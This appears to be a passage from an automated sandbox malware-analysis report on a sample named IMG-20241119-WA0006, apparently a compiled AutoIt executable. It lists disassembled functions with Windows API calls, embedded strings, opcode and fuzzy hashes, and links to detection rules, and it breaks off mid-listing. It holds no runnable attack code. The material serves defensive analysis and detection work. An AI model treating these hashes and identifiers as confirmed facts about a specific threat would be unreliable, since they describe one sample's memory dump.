String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 65a9cc88dcecd8b51e62f3526b17e2ae6b23b47344fff615612e3ae5ca1d20f2
Instruction ID: 03eab3d8ad4acae4fbebc30d919cb08206ea797a43bb4ffc6510e9f6d5029220
Opcode Fuzzy Hash: 65a9cc88dcecd8b51e62f3526b17e2ae6b23b47344fff615612e3ae5ca1d20f2
Instruction Fuzzy Hash: A6314F31648209AADB24FB60DE53EEDF3B5AF21755F20016AF481B10D6FF62AE04C755

Function 000BEA9D Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 000BEAB0
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000BEAC2
SetWindowTextW.USER32(?,?), ref: 000BEAD9
GetDlgItem.USER32(?,000003EA), ref: 000BEAEE
SetWindowTextW.USER32(00000000,?), ref: 000BEAF4
GetDlgItem.USER32(?,000003E9), ref: 000BEB04
SetWindowTextW.USER32(00000000,?), ref: 000BEB0A
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000BEB2B
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000BEB45
GetWindowRect.USER32(?,?), ref: 000BEB4E
SetWindowTextW.USER32(?,?), ref: 000BEBB9
GetDesktopWindow.USER32 ref: 000BEBBF
GetWindowRect.USER32(00000000), ref: 000BEBC6
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 000BEC12
GetClientRect.USER32(?,?), ref: 000BEC1F
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 000BEC44
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000BEC6F

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 5656a9d425484e33768a1a7fc2e0f5899587f19a008b714bf150042637044a44
Instruction ID: c2fcff086323866fa5afd9a25aad0e017e13571e6734f0322e1818fc6be0a89a
Opcode Fuzzy Hash: 5656a9d425484e33768a1a7fc2e0f5899587f19a008b714bf150042637044a44
Instruction Fuzzy Hash: 47513E71900749EFDB209FA8DD89FAFBBF5FF04704F004928E696A25A1D775A944CB10

Function 000D79B0 Relevance: 25.6, APIs: 17, Instructions: 109COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 000D79C6
LoadCursorW.USER32(00000000,00007F00), ref: 000D79D1
LoadCursorW.USER32(00000000,00007F03), ref: 000D79DC
LoadCursorW.USER32(00000000,00007F8B), ref: 000D79E7
LoadCursorW.USER32(00000000,00007F01), ref: 000D79F2
LoadCursorW.USER32(00000000,00007F81), ref: 000D79FD
LoadCursorW.USER32(00000000,00007F88), ref: 000D7A08
LoadCursorW.USER32(00000000,00007F80), ref: 000D7A13
LoadCursorW.USER32(00000000,00007F86), ref: 000D7A1E
LoadCursorW.USER32(00000000,00007F83), ref: 000D7A29
LoadCursorW.USER32(00000000,00007F85), ref: 000D7A34
LoadCursorW.USER32(00000000,00007F82), ref: 000D7A3F
LoadCursorW.USER32(00000000,00007F84), ref: 000D7A4A
LoadCursorW.USER32(00000000,00007F04), ref: 000D7A55
LoadCursorW.USER32(00000000,00007F02), ref: 000D7A60
LoadCursorW.USER32(00000000,00007F89), ref: 000D7A6B
GetCursorInfo.USER32(?), ref: 000D7A7B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: 8d195e4a3a77a89e419754b93095c4490d3c4104876709e8ee1d9b312ab10e83
Instruction ID: 6156c507456e2cb2eb53f25aefa9520e29eb99a08e742ebf2a2c1c7a1fb29fca
Opcode Fuzzy Hash: 8d195e4a3a77a89e419754b93095c4490d3c4104876709e8ee1d9b312ab10e83
Instruction Fuzzy Hash: 143129B0D083196ADF509FBA8C8995FBFE8FF44750F504527E50DE7280EA78A5008FA1

Function 0008C833 Relevance: 25.0, APIs: 7, Strings: 7, Instructions: 479COMMON

Download Yara Rule

APIs

Part of subcall function 0009E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0008C8B7,?,00002000,?,?,00000000,?,0008419E,?,?,?,0011DC00), ref: 0009E984

Part of subcall function 0008660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000853B1,?,?,000861FF,?,00000000,00000001,00000000), ref: 0008662F

__wsplitpath.LIBCMT ref: 0008C93E

Part of subcall function 000A1DFC: __wsplitpath_helper.LIBCMT ref: 000A1E3C

_wcscpy.LIBCMT ref: 0008C953
_wcscat.LIBCMT ref: 0008C968
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0008C978
SetCurrentDirectoryW.KERNEL32(?), ref: 0008CABE

Part of subcall function 0008B337: _wcscpy.LIBCMT ref: 0008B36F

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 000F311B
Unterminated string, xrefs: 000F3470
Bad directive syntax error, xrefs: 000F3429
#include depth exceeded. Make sure there are no recursive includes, xrefs: 000F3098
Error opening the file, xrefs: 000F30B4, 000F313D
EA06, xrefs: 000F30C9
AU3!, xrefs: 0008C90C

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 2258743419-1018226102
Opcode ID: d2df30836f09eac08ea2a3a55d012fb5d728c03d10c5515e3fc9203cc57be62f
Instruction ID: f4faa4b3edfbc5509379f41dce6d452fa3a72f7694b891a74a6aba095fd54877
Opcode Fuzzy Hash: d2df30836f09eac08ea2a3a55d012fb5d728c03d10c5515e3fc9203cc57be62f
Instruction Fuzzy Hash: 231279715083459FD724EF24C881AAFBBE4BF99314F04492EF5C993262DB30DA49DB62

Function 000ECE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000ECEFB
DestroyWindow.USER32(?,?), ref: 000ECF73
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 000ECFF4
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 000ED016
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ED025
DestroyWindow.USER32(?), ref: 000ED042
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00080000,00000000), ref: 000ED075
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 000ED094
GetDesktopWindow.USER32 ref: 000ED0A9
GetWindowRect.USER32(00000000), ref: 000ED0B0
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 000ED0C2
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 000ED0DA

Part of subcall function 0009B526: GetWindowLongW.USER32(?,000000EB), ref: 0009B537

Strings

tooltips_class32, xrefs: 000ECFED, 000ED06E
0, xrefs: 000ECF1B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
String ID: 0$tooltips_class32
API String ID: 3877571568-3619404913
Opcode ID: 10dbdbea092169b14c3064ad4ae13f1d8c0170e964250344670b4fddbf315b81
Instruction ID: 4bde660d81da9ec8a9cde8714967fafc6cb97b47ec44450fd5ca14aae00047e5
Opcode Fuzzy Hash: 10dbdbea092169b14c3064ad4ae13f1d8c0170e964250344670b4fddbf315b81
Instruction Fuzzy Hash: 7071CFB4140345AFDB24CF28CC85FAA77E5FB89704F08491EF985972A1D771E982CB12

Function 000EF351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

DragQueryPoint.SHELL32(?,?), ref: 000EF37A

Part of subcall function 000ED7DE: ClientToScreen.USER32(?,?), ref: 000ED807
Part of subcall function 000ED7DE: GetWindowRect.USER32(?,?), ref: 000ED87D
Part of subcall function 000ED7DE: PtInRect.USER32(?,?,000EED5A), ref: 000ED88D

SendMessageW.USER32(?,000000B0,?,?), ref: 000EF3E3
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 000EF3EE
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 000EF411
_wcscat.LIBCMT ref: 000EF441
SendMessageW.USER32(?,000000C2,00000001,?), ref: 000EF458
SendMessageW.USER32(?,000000B0,?,?), ref: 000EF471
SendMessageW.USER32(?,000000B1,?,?), ref: 000EF488
SendMessageW.USER32(?,000000B1,?,?), ref: 000EF4AA
DragFinish.SHELL32(?), ref: 000EF4B1
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 000EF59C

Strings

@GUI_DRAGFILE, xrefs: 000EF54B
@GUI_DRAGID, xrefs: 000EF510
@GUI_DROPID, xrefs: 000EF4D1

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 169749273-3440237614
Opcode ID: 26f15760a7e214def651099172d58c841f3d59ff828e83095a21e2ecaa509b29
Instruction ID: 53e45ec113d9b032da6871bd55604daeae1968d6ce8112b020190a808bd47e2e
Opcode Fuzzy Hash: 26f15760a7e214def651099172d58c841f3d59ff828e83095a21e2ecaa509b29
Instruction Fuzzy Hash: 51613A71108341AFC711EF64DC85DAFBBF8BF89714F004A1EF595A21A2DB709A49CB52

Function 000CAAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000000), ref: 000CAB3D
VariantCopy.OLEAUT32(?,?), ref: 000CAB46
VariantClear.OLEAUT32(?), ref: 000CAB52
VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 000CAC40
__swprintf.LIBCMT ref: 000CAC70
VarR8FromDec.OLEAUT32(?,?), ref: 000CAC9C
VariantInit.OLEAUT32(?), ref: 000CAD4D
SysFreeString.OLEAUT32(00000016), ref: 000CADDF
VariantClear.OLEAUT32(?), ref: 000CAE35
VariantClear.OLEAUT32(?), ref: 000CAE44
VariantInit.OLEAUT32(00000000), ref: 000CAE80

Strings

%4d%02d%02d%02d%02d%02d, xrefs: 000CAC6A
Default, xrefs: 000CACFD

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
String ID: %4d%02d%02d%02d%02d%02d$Default
API String ID: 3730832054-3931177956
Opcode ID: cfc5a27c1475e3e49cd8f9259f8ae780913bc813a1a900e1f6fdbc54019f2bfc
Instruction ID: 0879949e818eccb04fac84da060a84c27e201ecd078e129c6c3657bea537f49a
Opcode Fuzzy Hash: cfc5a27c1475e3e49cd8f9259f8ae780913bc813a1a900e1f6fdbc54019f2bfc
Instruction Fuzzy Hash: 57D1DE71B00219EBDB249FA5D885FAEB7B5BF06704F14845DF4069B582DB70EC80DBA2

Function 000E716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 000E71FC
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000E7247

Strings

GETTOTALCOUNT, xrefs: 000E722A
UNCHECK, xrefs: 000E740B
GETSELECTED, xrefs: 000E733F
CHECK, xrefs: 000E7267
SELECT, xrefs: 000E73E0
GETTEXT, xrefs: 000E7382
EXISTS, xrefs: 000E72B0
COLLAPSE, xrefs: 000E728D
ISCHECKED, xrefs: 000E73B2
GETITEMCOUNT, xrefs: 000E7311
EXPAND, xrefs: 000E72E1

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: d8cb8c9c505059af76961f30e36f78c80152e601c3f7366b9edc68cfd8a5b250
Instruction ID: 0b7b730af01d63a777e8ca0a0463abde49fa80b14c0f4de457e53429326e0f5b
Opcode Fuzzy Hash: d8cb8c9c505059af76961f30e36f78c80152e601c3f7366b9edc68cfd8a5b250
Instruction Fuzzy Hash: 31914A742087419FCB15EF21C851AAEB7A1BF94310F04485DF99A6B3A3DB31ED4ADB81

Function 000EE4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 000EE5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,000E9808,?), ref: 000EE607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 000EE6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,000E9808,?), ref: 000EE6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 000EE6DF
DestroyIcon.USER32(?), ref: 000EE6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 000EE70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 000EE717

Part of subcall function 000A0FA7: __wcsicmp_l.LIBCMT ref: 000A1030

Strings

.dll, xrefs: 000EE564
.exe, xrefs: 000EE541
.icl, xrefs: 000EE521

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: c4663aa464d596d603b49a21f7259fe986e2c9237ff6435a785bfd17004d8feb
Instruction ID: b98794fc6de97ad32ac93e8fc79a27427bfff82b3d8372cb31cc592e4466a7ff
Opcode Fuzzy Hash: c4663aa464d596d603b49a21f7259fe986e2c9237ff6435a785bfd17004d8feb
Instruction Fuzzy Hash: F3610171500699FEEB20DFA5DC46FFE77A8BB18764F104115F951E60D1EBB0AA80CBA0

Function 000CD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0008936C: __swprintf.LIBCMT ref: 000893AB
Part of subcall function 0008936C: __itow.LIBCMT ref: 000893DF

CharLowerBuffW.USER32(?,?), ref: 000CD292
GetDriveTypeW.KERNEL32 ref: 000CD2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CD327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CD35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 000CD38C

Strings

type cdaudio alias cd wait, xrefs: 000CD30A
close cd wait, xrefs: 000CD377
open, xrefs: 000CD2B9
close, xrefs: 000CD298
wait, xrefs: 000CD349
open , xrefs: 000CD2EE
closed, xrefs: 000CD2A6, 000CD2AF
set cd door , xrefs: 000CD32D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 36e3d2aa9dcee97a79e513ef1bbdeb68068a0a45c3d224b361b2636bf7de53b7
Instruction ID: 9445cd77918b8681059422cffbe6491d663e693edbf78f77fb8e1782cd279bbf
Opcode Fuzzy Hash: 36e3d2aa9dcee97a79e513ef1bbdeb68068a0a45c3d224b361b2636bf7de53b7
Instruction Fuzzy Hash: 0B512971104645AFC700EF20C9819AEB7E4FF98758F04486DF8D6A7292DB31EE06DB52

Function 000C26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,000F3973,00000016,0000138C,00000016,?,00000016,0011DDB4,00000000,?), ref: 000C26F1
LoadStringW.USER32(00000000,?,000F3973,00000016), ref: 000C26FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,000F3973,00000016,0000138C,00000016,?,00000016,0011DDB4,00000000,?,00000016), ref: 000C271C
LoadStringW.USER32(00000000,?,000F3973,00000016), ref: 000C271F
__swprintf.LIBCMT ref: 000C276F
__swprintf.LIBCMT ref: 000C2780
_wprintf.LIBCMT ref: 000C2829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 000C2840

Strings

^ ERROR, xrefs: 000C27D5
Line %d (File "%s"):, xrefs: 000C2769
%s (%d) : ==> %s: %s %s, xrefs: 000C2824
Line %d:, xrefs: 000C277A
Error: , xrefs: 000C27F7

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: e6acc8e01ead2ebc5f4e8d75d691dbecd2edadc747cab1c70a9d5d8b73388a3c
Instruction ID: 7526dec6ecf20905fce9f1375ca418da4072a248e3f5ca84e343f733006b698f
Opcode Fuzzy Hash: e6acc8e01ead2ebc5f4e8d75d691dbecd2edadc747cab1c70a9d5d8b73388a3c
Instruction Fuzzy Hash: 40412772800219AADF14FBE0DE86EEEB778BF15745F100069B541B6093EB746F49CB60

Function 000CD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000CD0D8
__swprintf.LIBCMT ref: 000CD0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 000CD137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 000CD15C
_memset.LIBCMT ref: 000CD17B
_wcsncpy.LIBCMT ref: 000CD1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 000CD1EC
CloseHandle.KERNEL32(00000000), ref: 000CD1F7
RemoveDirectoryW.KERNEL32(?), ref: 000CD200
CloseHandle.KERNEL32(00000000), ref: 000CD20A

Strings

\??\%s, xrefs: 000CD0F4
\, xrefs: 000CD110
:, xrefs: 000CD11B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 32f698fa1ab5c2371930461e2968d0e71ed22ba2edbce9f9ec09e265f9bb1478
Instruction ID: 782845cb9f8cd84f31b314319b2a0ac0a0d20481de3e4de6eb76d80d88b79c3c
Opcode Fuzzy Hash: 32f698fa1ab5c2371930461e2968d0e71ed22ba2edbce9f9ec09e265f9bb1478
Instruction Fuzzy Hash: 9031AFB650010AABDB21DFA0DC49FEF37BCEF89740F1041BAF909D2161EB7096848B24

Function 000B87CD Relevance: 22.7, APIs: 15, Instructions: 210COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 000B882D
___wtomb_environ.LIBCMT ref: 000B884F

Part of subcall function 000A7C0E: __getptd_noexit.LIBCMT ref: 000A7C0E

__malloc_crt.LIBCMT ref: 000B8875
__malloc_crt.LIBCMT ref: 000B8892
_free.LIBCMT ref: 000B88C9
__recalloc_crt.LIBCMT ref: 000B8902
__recalloc_crt.LIBCMT ref: 000B8947
_strlen.LIBCMT ref: 000B8973
__calloc_crt.LIBCMT ref: 000B897D
_strlen.LIBCMT ref: 000B898C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 000B89BA
_free.LIBCMT ref: 000B89D4
_free.LIBCMT ref: 000B89E1
_free.LIBCMT ref: 000B89F3
__invoke_watson.LIBCMT ref: 000B8A0D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID:
API String ID: 884005220-0
Opcode ID: e71aa7cdc8bc3617d5ee52bbf177f64347ba2b544a9753ac8a8b782804f3f683
Instruction ID: 373cc77a91582efab8f5cc6bde4a59c770fb9351d16cb9949a2c531954816fbc
Opcode Fuzzy Hash: e71aa7cdc8bc3617d5ee52bbf177f64347ba2b544a9753ac8a8b782804f3f683
Instruction Fuzzy Hash: 7E61E172900211EFDB256F64DC417FA37ECAF16721F24812AE805AB1B2EF35D941CB95

Function 000EE731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 000EE754
GetFileSize.KERNEL32(00000000,00000000), ref: 000EE76B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 000EE776
